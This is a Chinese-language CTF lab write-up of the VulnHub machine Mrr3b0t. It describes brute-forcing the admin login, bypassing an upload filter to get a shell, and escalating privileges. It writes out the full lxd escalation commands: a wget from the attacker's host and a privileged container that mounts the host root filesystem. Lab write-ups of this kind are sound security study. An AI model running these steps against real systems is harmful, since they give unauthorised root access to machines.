VulnHub靶场之Bizarre Adventure: Mrr3b0t

扫描IP以及端口:

访问80,一个模板网站,,,扫描目录:

不可描述的flag.txt.txt,去看看:

没找到,去看看administrator,尝试弱密码,登陆失败,没有用户名密码错误提升啥的:

继续寻找flag.txt.txt提示的hidden,,,再images中找到一个名叫hidden的图片:

去在线解密一下:

得到一个用户名mrrobot,需要进行暴力破解,,,
直接用bp抓包进行破解,这里我使用的是rockyou.txt,1000多万的字典,,,:

登录:

文件上传,,,,过滤了:The image format must be jpg,jpeg,gif,png
抓包进行修改:

就是上传到administrator目录下,访问,监听,,

获取到shell,,获取交互式shell:

查看用户存在一个exploiter用户:

继续查找可用文件,,找到一个buffer:

不会吧不会吧,不会又是pwn之类的吧,,strings查看一下:

找到一个密码,su expoliter:

sudo -l查看一下,不能运行sudo,,:

id看看,有lxd,,,可以尝试lxd提权:

具体方法请看这篇文章:Lxd Privilege Escalation
先在本地执行如下命令:

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

一开始一直failed,之后更新一下kali就好了:

可以看在目录下生成一个tar.gz文件:

上传到shell服务器上,,,

服务器上下载:

cd /tmp
wget http://192.168.1.10:8000/apline-v3.12-x86_64-20201004_1015.tar.gz


生成映像后,可以将其作为映像添加到LXD中:

lxc image import ./apline-v3.12-x86_64-20201004_1015.tar.gz --alias myimage


使用list命令检查镜像列表:

lxc image list


继续执行命令:

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id



成功获取到flag:

小结

几经波折,,,学到了许多东西,首先收获最大的就是lxd提权,第一次做,
找了很多文章,错误百出,不过好在最后解决了,,遇见问题不要慌张,慢慢去解决
曾经提权这一部分几度想放弃了,,,,lxd提权这部分需要消化理解吸收,还需加强自身实力

VulnHub靶场之Bizarre Adventure: Mrr3b0t相关推荐

  1. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  2. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  3. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  4. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  5. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  6. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

  7. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  8. vulnhub靶场,FirstBlood

    vulnhub靶场,FirstBlood 环境准备 靶机下载地址:https://www.vulnhub.com/entry/firstblood-1,564/ 攻击机:kali(192.168.10 ...

  9. VulnHub靶场LupinOne

    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...

最新文章

  1. 【Kubernetes】如何使用Kubeadm部署K8S集群
  2. 亚洲诚信联合又拍云升级云端SSL证书服务
  3. 同步电机调速matlab,基于matlab的永磁同步电机调速系统的仿真word格式
  4. 如何为某些HTML标记存储任意数据
  5. Exception in thread main java.lang.Error: Unresolved compilation problems 解决方案
  6. 小米10至尊纪念版DXO第一 雷军:这是小米打拼三年第二次登顶
  7. echarts 水桶注水式柱状图
  8. HSSWORKBOOK中读取Excel出现的异常现象
  9. 双向链表基本实现简单贪吃蛇
  10. 《白帽子讲web安全》读书笔记_2021-07-16
  11. 计算机毕设如何做?点进来,干货分享。
  12. java面试说话技巧,Java面试题及解答技巧解析介绍
  13. 网卡 eth0,eth1,eth2,lo分别代表是什么 意思
  14. k均值的损失函数_常用的损失函数
  15. Linux系统Centos7的虚拟机安装
  16. IC、FPGA验证学习
  17. 机械硬盘通过USB外接到电脑,显示不出来
  18. 你还别不信:过度关注技术就是浪费时间
  19. (转)ubuntu软件列表
  20. 会计学原理学习笔记——第三章——账户与复式记账(3.6生产准备业务核算——制造费用与完工产品成本计算与核算)

热门文章

  1. web 修改图片形状为圆形
  2. windows系统上最后一个redis版本Redis-x64-3.0.504下载与安装配置
  3. 一个有意思的编程练习网站
  4. Zuul1和Zuul2该如何选择?
  5. 应聘架构师,面试最容易被问啥?
  6. 简述mysql的存储的优点_MySQL 存储过程 优点和缺点有哪些?
  7. 下载双人成行It Takes Two Friend‘s Pass没反应的解决方法
  8. java 设置word刷新_Java 设置Word中的表格自适应的3种方式
  9. PPT模板-湘潭大学-汇报答辩通用模板
  10. Rosetta如何连接隐私计算与AI?道翰天琼认知智能机器人平台API接口大脑为您揭秘。